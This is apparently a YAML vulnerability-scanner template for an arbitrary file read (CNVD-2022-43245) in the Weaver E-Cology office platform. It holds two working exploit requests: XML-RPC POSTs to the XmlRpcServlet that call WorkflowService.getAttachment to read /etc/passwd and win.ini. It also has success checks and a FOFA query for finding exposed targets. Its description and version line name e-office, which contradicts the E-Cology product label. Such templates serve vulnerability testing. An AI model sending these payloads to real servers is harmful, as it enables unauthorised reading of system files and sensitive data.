product: 泛微E-Cology
vName: 泛微E-Cology xmlrpcServlet接口任意文件读取
type: 文件读取
vID:
  - CNVD-2022-43245
level: 3
vDesc: e-office is a standard collaborative mobile office platform. Ltd. e-office has an arbitrary file reading vulnerability, which can be exploited by attackers to obtain sensitive information.
version: e-office < 9.5 20220113
note: ''
search:
  FOFA: app="泛微-OA（e-cology）"
protocol: http
link: https://blog.csdn.net/xiayu729100940/article/details/135205082
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      path: /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet
      method: post
      header:
        Content-Type: application/xml
      data: <?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>WorkflowService.getAttachment</methodName> <params><param><value><string>/etc/passwd</string></value></param></params></methodCall>
    verify:
      logic: and
      check:
        - body:
            value:
              - <methodResponse><params><param><value><base64>
            logic: and
          header:
            value:
              - text/xml
            logic: and
          status: 200
  - exp:
      path: /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet
      method: post
      header:
        Content-Type: application/xml
      data: <?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>WorkflowService.getAttachment</methodName> <params><param><value><string>c://windows/win.ini</string></value></param></params></methodCall>
    verify:
      logic: and
      check:
        - body:
            value:
              - <methodResponse><params><param><value><base64>
            logic: and
          header:
            value:
              - text/xml
            logic: and
          status: 200
